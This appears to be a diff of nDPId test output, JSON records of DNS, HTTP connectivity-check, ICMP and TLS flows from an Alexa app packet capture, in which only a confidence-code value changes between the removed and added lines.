-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1490976027725,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1490976027725,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM0NhAAEARvM6sECoBrBAq2AA1KN4AOCjyfT2BgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAAEGAATYOtrE"} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027725,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027725,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027733,"flow_last_seen":1490976027733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1490976027733,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027733,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8c0BAAEAGOiysECrYrNkJjorUAFAegTplAAAAAKAC\/\/+MiQAAAgQFtAQCCAoA9kklAAAAAAEDAwg="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1490976027741,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1490976027741,"pkt":"MzMAAAACePiC0\/vCht1gAAAAABA6\/\/6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAChQCMEAAAAAABAXj4gtP7wg=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1490976027776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027776,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8g+MAADQGdYms2QmOrBAq2ABQitTVYWKuHoE6ZqASpahLiwAAAgQFZAQCCApVvw3GAPZJJQEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1490976027777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027777,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c0FAAEAGOjOsECrYrNkJjorUAFAegTpm1WFir4AQAVceVQAAAQEICgD2SSlVvw3G"} 
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027733,"flow_last_seen":1490976027780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976027780,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027733,"flow_last_seen":1490976027780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976027780,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} 
00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1490976027958,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1490976027958,"pkt":"ePiC0\/vCAMDKkaPvCABFwABQaiwAAEABYsesECoBrBAq2AUBiVKsECoqRQAANNZ6QAA\/BgDirBAq2K3C37ynfhRsXkGjCY7hdlaAEAFbkZsAAAEBCAoA9kk7K\/xGxA=="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.192626} 
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.192626} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029184,"flow_last_seen":1490976029184,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976029184,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1490976029184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029184,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Wk5AAEARM2msECrYrBAqAbwbADUAKEUyqIoBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} 
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029184,"flow_last_seen":1490976029184,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976029184,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029184,"flow_last_seen":1490976029184,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976029184,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1490976029244,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976029244,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC90PZAAEARvD+sECoBrBAq2AA1vBsAqWPAqIqBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAAToAAoDd3d3A2NkbsAQwCwABQABAAAABgAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAQABDRV0cXAQgABAAEAAAAEAAQ0VdGPwEIAAQABAAAABAAENFXR2MBCAAEAAQAAAAQABDRV0Xo="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976029244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.197"}} 
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976029244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.197"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029248,"flow_last_seen":1490976029248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029248,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1490976029248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029248,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8xDtAAEAGmX2sECrYNFXRxdfKAbvTso2HAAAAAKAC\/\/\/liQAAAgQFtAQCCAoA9km8AAAAAAEDAwg="} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1490976029325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029325,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqrg0VdHFrBAq2AG718qLhBMS07KNiKAScSCB1QAAAgQFtAQCCAptCebiAPZJvAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1490976029328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976029328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xDxAAEAGmYSsECrYNFXRxdfKAbvTso2Ii4QTE4AQAVcgZAAAAQEICgD2ScRtCebi"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029248,"flow_last_seen":1490976029341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976029341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1669,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3691,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029248,"flow_last_seen":1490976029341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976029341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1669,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3691,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1490976029669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1490976029669,"pkt":"AMDKkaPvePiC0\/vCCABFAABGWk9AAEARM16sECrYrBAqAU3\/ADUAMlRV5qsBAAABAAAAAAAABG1hZHMPYW1hem9uLWFkc3lzdGVtA2NvbQAAAQAB"} 
-00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 